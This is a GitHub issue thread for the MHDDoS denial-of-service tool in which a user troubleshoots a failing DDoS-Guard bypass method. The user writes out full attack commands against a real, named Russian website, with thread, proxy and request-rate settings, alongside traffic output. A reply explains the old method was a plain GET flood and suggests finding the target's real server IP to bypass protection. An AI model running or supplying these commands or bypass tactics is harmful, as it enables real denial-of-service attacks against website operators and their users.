MHDDoS icon indicating copy to clipboard operation
MHDDoS copied to clipboard

Zero value with DGB attack method

Open alexnest-ua opened this issue 2 years ago • 2 comments

using https://github.com/porthole-ascend-cinnamon/mhddos_proxy just to run many targets in one line

runs this with the old commit ( https://github.com/MHProDev/MHDDoS/tree/c6922926e9e5b35f6ecab58e0ace0d8bc1aecb87 ): sudo python3 runner.py https://www.tadviser.ru https://www.tadviser.ru/index.php/Аналитика_TAdviser https://www.tadviser.ru/index.php/Судебные_дела -t 5000 -p 600 --rpc 500 --http-methods DGB --debug

and the output is normal: [17:10:17 - DEBUG] PPS: 770, BPS: 690.75 kB / 0% [17:10:17 - DEBUG] PPS: 1.43k, BPS: 1.04 MB / 0% [17:10:18 - DEBUG] PPS: 2.45k, BPS: 2.15 MB / 0% [17:10:18 - DEBUG] PPS: 1.48k, BPS: 1.34 MB / 0% [17:10:18 - DEBUG] PPS: 1.72k, BPS: 1.27 MB / 0% [17:10:19 - DEBUG] PPS: 1.71k, BPS: 1.50 MB / 0% [17:10:19 - DEBUG] PPS: 974, BPS: 864.64 kB / 0% [17:10:19 - DEBUG] PPS: 1.21k, BPS: 875.07 kB / 0% [17:10:20 - DEBUG] PPS: 1.81k, BPS: 1.59 MB / 0% [17:10:20 - DEBUG] PPS: 820, BPS: 735.47 kB / 0% [17:10:20 - DEBUG] PPS: 769, BPS: 563.03 kB / 0% [17:10:21 - DEBUG] PPS: 1.01k, BPS: 884.17 kB / 0% [17:10:21 - DEBUG] PPS: 605, BPS: 546.55 kB / 0% [17:10:21 - DEBUG] PPS: 779, BPS: 572.32 kB / 0%

runs this with the actual commit ( https://github.com/MHProDev/MHDDoS/tree/b22865fe5f3e78fe82f632d10b478b4ddf551a78 ): sudo python3 runner.py https://www.tadviser.ru https://www.tadviser.ru/index.php/Аналитика_TAdviser https://www.tadviser.ru/index.php/Судебные_дела -t 5000 -p 600 --rpc 500 --http-methods DGB --debug

and the output is zero: [19:06:49 - DEBUG] ←[93mTarget:←[94m www.tadviser.ru,←[93m Port:←[94m 443,←[93m Method:←[94m DGB←[93m PPS:←[94m 0,←[93m BPS:←[94m -- B / 2%←[0m [19:06:49 - DEBUG] ←[93mTarget:←[94m www.tadviser.ru,←[93m Port:←[94m 443,←[93m Method:←[94m DGB←[93m PPS:←[94m 0,←[93m BPS:←[94m -- B / 2%←[0m [19:06:49 - DEBUG] ←[93mTarget:←[94m www.tadviser.ru,←[93m Port:←[94m 443,←[93m Method:←[94m DGB←[93m PPS:←[94m 0,←[93m BPS:←[94m -- B / 2%←[0m [19:06:50 - DEBUG] ←[93mTarget:←[94m www.tadviser.ru,←[93m Port:←[94m 443,←[93m Method:←[94m DGB←[93m PPS:←[94m 0,←[93m BPS:←[94m -- B / 2%←[0m [19:06:50 - DEBUG] ←[93mTarget:←[94m www.tadviser.ru,←[93m Port:←[94m 443,←[93m Method:←[94m DGB←[93m PPS:←[94m 0,←[93m BPS:←[94m -- B / 2%←[0m [19:06:50 - DEBUG] ←[93mTarget:←[94m www.tadviser.ru,←[93m Port:←[94m 443,←[93m Method:←[94m DGB←[93m PPS:←[94m 0,←[93m BPS:←[94m -- B / 2%←[0m

I think the problem is cookie: https://github.com/MHProDev/MHDDoS/blob/b22865fe5f3e78fe82f632d10b478b4ddf551a78/start.py#L809

alexnest-ua avatar Mar 23 '22 17:03 alexnest-ua

@alexnest-ua The old version actually runs GET method, despite saying DGB is used. Check this method - it has not if for the DGB (see the relevant issue #231).

Current DGB implementation does not work - and it's unlikely there exists a working implementation of DDoS-Guard bypass. Either you can find the real servers IP, or you have no luck DDoSing them. Again, just to repeat, the traffic in your first example just hits the DDoS-Guard servers and does nothing to the actual target, since it actually runs a plain GET attack.

Then let the author remove this method / indicate that it is not working, or find an implementation to bypass the DDoS guard

alexnest-ua avatar Mar 23 '22 19:03 alexnest-ua